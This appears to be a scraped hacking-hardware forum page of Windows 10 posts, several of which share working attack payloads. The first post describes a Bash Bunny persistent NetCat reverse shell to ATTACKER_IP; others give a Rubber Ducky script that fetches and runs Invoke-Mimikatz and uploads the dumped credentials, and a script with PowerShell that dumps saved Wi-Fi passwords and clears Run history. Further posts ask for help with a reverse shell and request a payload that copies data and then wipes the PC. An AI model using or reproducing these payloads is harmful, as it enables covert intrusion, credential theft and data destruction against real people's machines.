Search the Community

Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download

Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

As the title says i would like to learn to change/spoof my MAC Address, I changed my network cards Locally Administered MAC Address but this did not work as after a restart to make the changes set in i checked my modem-router and it showed that my MAC Address was still the hardwares value rather than the new one i set. If i did someone wrong please let me know, if there is something else i can try im all ears. All help is greatly appreciated.

My first script using the Ducky... Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise: * It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY * It then uses Select-String cmdlet to get the password for the wireless networks on the target machine * Saves this (albeit slightly messily) to Output.txt on the Ducky * Finally gets rid of the TEMP file and history in the run command window Look forward to comments and anything anyone can suggest to speed this up and make it better. Cheers Audie Ducky Script REM Author: Audie2180 REM Ducky WIFI credential plain text password report: 1.0 REM Target: Windows 10 REM Firmware: Twin Duck 2.1 REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks DELAY 1000 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ----Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM ----Make batch file that waits for SD card to mount. REM ----Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM ----Continue script STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt ENTER CONTROL z ENTER REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Run BAT file DELAY 1000 GUI r DELAY 500 STRING %TEMP%/DuckyWait.bat DELAY 500 ENTER DELAY 800 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM --- Clean up, close CMD, delete tmp files, remove command prompt hist REM --- Cleanup file created DELAY 500 STRING del /f %TEMP%\DuckyWait.bat ENTER REM ----Clear the Run history and exit DELAY 500 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Flash CAPSLOCK CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK ... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file... a.ps1 #Make a list with all WiFi SSID's and passwords stored locally on Windows OS. $output = netsh.exe wlan show profiles $profileRows = $output | Select-String -Pattern 'All User Profile' $profileNames = New-Object System.Collections.ArrayList #for each profile name get the SSID and password for($i = 0; $i -lt $profileRows.Count; $i++){ $profileName = ($profileRows[$i] -split ":")[-1].Trim() $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' if($passwordSearchResult){ $profilePw = ($passwordSearchResult -split ":")[-1].Trim() } else { $profilePw = '' } $networkObject = New-Object -TypeName psobject -Property @{ ProfileName = $profileName SSID = $profileSSID Password = $profilePw } $profileNames.Add($networkObject) } $profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password

So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did copy and paste. And put it on pastebin, so heres the link hopefully one of you can help me i would also like to say the the target pc had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local ip. That link shows the whole process of setting up the payload and handler thats what all i did. Thanks to everyone who takes the time to read this i really need help.

So I am picking up this bad boy today http://www.microcenter.com/product/474706/XPS_15_156_Gaming_Laptop_Computer_-_Silver and I am going to throw Ubuntu 16.04 on it. I am not interested in dual booting as I have been using Linux for years. However, now that Windows 10 doesn't come with physical CD keys anymore does anyone know a way to get the Windows 10 licence key extracted encase I want to throw windows back on it?

As of 10/30/17 kali linux downloads will not work, through both the HTTP download and the torrent link, both debian.exe installer packages can not locate win32-loader.ini on my windows 10 laptop. If anybody has a torrent for the old ISO file it would be much appreciated ive been at this for about 3 hours now and cant find a ISO image to flash onto the usb stick on kali.org and the Virtual images are not working for me either.

Hi Guys, My friend has lent me his harddrive with some music production files (.wav and .mp3 files) on it but he has somehow encrypted the files and has asked me to remove the encryption from it. He says he used Windows 10 and after some digging around found Microsoft uses EFS Encryption. I tried his laptop to remove the encryption as it would have had the key to it and after an hour of playing around he tells me that he re-installed the OS so the key would have been lost. I have searched online for a few answers and found a couple which haven't convinced me. I found this site https://www.elcomsoft.co.uk/aefsdr.html that says it can remove EFS on NTFS but I am not willing to pay the price tag unless I have proof of success If anyone can verify for me that they have a good success rate that would be awesome Or does anyone know if GitHub has any programs that can be run in a Linux OS like Kali or Parrot that I can use to break the encryption?

Hello! I recently ordered a USB Rubber Ducky, and still a noob at it. I was wondering if one of you guys would be kind enough to make it do something, if it's possible. I want it, after it's plugged, to immediately start backing up the windows 10 and then after that it sends saves it online, or I heard about "TwinDuck" which can make it save it on there, which is better... So after it saves a backup on the Ducky, I want it to completely destroy the PC, maybe by erasing "System32" I am not sure I just want it to mess it up and delete everything. All while the backup is still on the rubber ducky. I would really appreciate if one could help me with such a mission, thanks! PS: If it could be compatible with all windows versions, it would be better.

I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?

I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?

I'm trying to upgrade my firmware of this yard stick one. But I keep getting different errors. Now I have the bad address one. root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 erase_all RC = 0 (OK) root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 download firmware/CCBootloader/CCBootloader-rfcat-ys1.hex Writing :0600000002017B02140363 RC = 3 (Bad Address) Error downloading code!

I am finding that I am having an error with some PowerShell code that I am working on. What I want to be able to do is to have a variable, say $uk, where the drive label name is 'backup' and then force the creation of folders using the declared variable as the drive letter eg $uk\$env:computername\$env:username . The code is pasted below: #Asssigns $uk Variable to current drive letter for the mounted volume where the label name = backup $uk = Get-WmiObject Win32_Volume | ? {$_.label -eq 'backup'} #Creates a directory on the C:\ Drive naming the folders [The Computer Name] and [User] and ignores if already exists. md $uk\$env:computername\$env:username -force | Out-Null #It then uses Get-WmiObject to get the OS information and exports this info to the created directory calling the file export.csv. Get-WmiObject -class win32_operatingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv #Then echos Export Complete into console. echo "Export Complete" #Sleep for two seconds. Start-Sleep -s 2 #Kill Powershell process. #stop-process -Id $Pid However, when this runs I get this error: md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException + FullyQualifiedErrorId : ItemExistsArgumentError,Microsoft.PowerShell.Commands.NewItemCommand md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...\"\MATT-PC\Matt:String) [New-Item], Argu mentException + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand Export-Csv : Cannot perform operation because the wildcard path \\MATT-PC\root\cimv2:Win32_Volume.DeviceID= "\\\\?\\Volume{2277fba4-e118-11e3-8533-94de807ff6ed}\\"\MATT-PC\Matt\export.csv did not resolve to a file. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:10 char:46 + ... ingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : OpenError: (\\MATT-PC\root\...Matt\export.csv:String) [Export-Csv], FileNotF oundException + FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.ExportCsvCommand Obviously there is an error in the file path where it is trying to get the volume. I am not too sure how i would fix this tried wrapping the variable name in ${} and with a :\ after the variable eg $uk:\, neither of these produce the desired result. Can anyone help? Matt

Can somebody of the staff answer this question please. How can i get RNDIS_ethernet to work on windows 10?

Has anyone encountered issues when plugging the Bash Bunny into a Windows 10 Machine? RNDIS_EHTERNET on Windows 10 brings up a Device Driver Install window which stays on the screen for some time. This can be minimized via the bunny script; however I wasn't sure if this was an expected behavior.

Has anyone else come across any driver issues with the RNDIS or WPD drivers for BashBunny on Windows 10 x64 Build 14393? Flash drive loads, payload is set for ATTACKMODE RNDIS_ETHERNET STORAGE and the device shows in device manager but without drivers.

Greetings, I just received the BashBunny in the mail, so please bare with me. I was just trying to get started, when I ran into problems trying to share an internet connection w/ Windows 10. If I use the default payload on switch 2, ATTACKMODE RNDIS_ETHERNET STORAGE, or vise versa, it refuses to pop up as an Ethernet device in Windows. Just RNDIS_ETHERNET works, but isn't that kind of a problem when it comes to saving loot? On a side note: " Many combinations of attack modes are possible, however some are not. For example, ATTACKMODE HID STORAGE ECM_ETHERNET is valid while ATTACKMODE RNDIS_ETHERNET ECM_ETHERNET STORAGE SERIAL is not." - http://wiki.bashbunny.com/#!index.md How do I know what is a proper attackmode combination?

Hi, I have my Nano setup properly on 2 laptops. However when I try to use my desktop at home there is no dropdown box to select the pineapple for internet sharing in the configure adapters menu for Win 10? I have tried disabling Defender which was suggested on another site, did not fix it. :( Any help would be greatly appreciated Here is a screenshot there should be a dropdown menu under Allow other network users to connect

Hello, First time posting, so please feel free to correct me if I am posting in the wrong place. I am finally upgrading my old rig to 64bit and reformating so to have a clean install with multiple partitions, so I can easily reformat in the future. What I was trying to find and could not locate was the episode in the pre-revision3 days where Derren had made a boot disk with all of the softwares he wanted were already pre-installed on the os. I would like to do the same but in a reformat drive. Where I would boot my pc into and do a clean install with all my softwares already there just need to load keys or update them. At one point I thought I would make my set up and then make a ghost image of it on a drive. So I would just copy the image back over the drive with my os on it. Can this be done on windows 10 and how should I go about it.

I purchased the Rubber Ducky recently to grab windows login creds from Windows 10. I was unaware at the time that it wouldn't quite work as solid on 10 as it does with older versions of windows. After testing on various other versions and having it upload the .creds to my server nothing happened when I attempted it on my target machine (Windows 10). I played around with quite a bit and finally got the .creds uploading but with 0 data. Doing some research I came across this page explaining using PowerMemory to edit the registry for storing plaintext credentials. I did this the manual way, rebooted, and viola I have my .creds file on the server with the credentials. However this was done on a test machine and not my target machine. HERE IS MY REQUEST: Does anyone have or can write a payload to automate this process in a stealth manner much like the Mr Robot payload? Maybe I am overlooking something as I am so new to this. Also it could be possible that it would have worked without PowerMemory editing the registry as I disabled Windows Defender before trying PM as I saw it has blocked some MK features during my previous attempts. Any feedback would be greatly appreciated!

Hi I had to set up 6 pc's and a laptop. The pc's were shipped to the users office. I spent two days setting every thing up due to not being able to use USMT and network issues on these pc's to transfer data from the old to the new. There are some issues with drivers for things like printers and scanners.

Alright, so I purchased rubber ducky a few weeks ago. Since I received the package I been trying simple payloads but it never works for me. Part of the problems is that every time I plug in the USB, the target machine (Windows10 or Windows7 no security software) behaves as if I'm pressing ctrl+alt+del. If I don't touch anything and lets says they are a couple of tab keystrokes on the payload. I can see the machine tabbing through the ctrl+alt+del screen menu. Which leads me to believe the USB is recognized and somewhat functioning. But it doesn't matter what I use for the first line of the payload. It can be GUI r or Controls Escape the behavior is always the same. REM open cmd DELAY 3000 GUI r DELAY 300 STRING cmd DELAY 100 ENTER

I have added a script to set the background image of a windows 10 ( might work on other versions also..) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Change-the-background-to-MyLittlePoney-(win10) Regards Keld. rubberduckcode.txt

I have no idea why clients won't connect to my Tetra? Can someone offer me some thoughts? I've followed all the vids and docs... Very frustrated :-( Hope this can get resolved.

Hi, I am new to wifi pineapple. I am having a problem with my wifi pineapple nano for windows 10. I followed the initial setup of nano for windows and I am not getting any internet connection. When I click the "Load Bulletins" from Dashboard, I get the error: "Error connecting to WiFiPineapple.com. Please check your connection.". I have attached the images for my network setting and the error I am getting. Can someone please tell me what I am doing wrong? Thanks!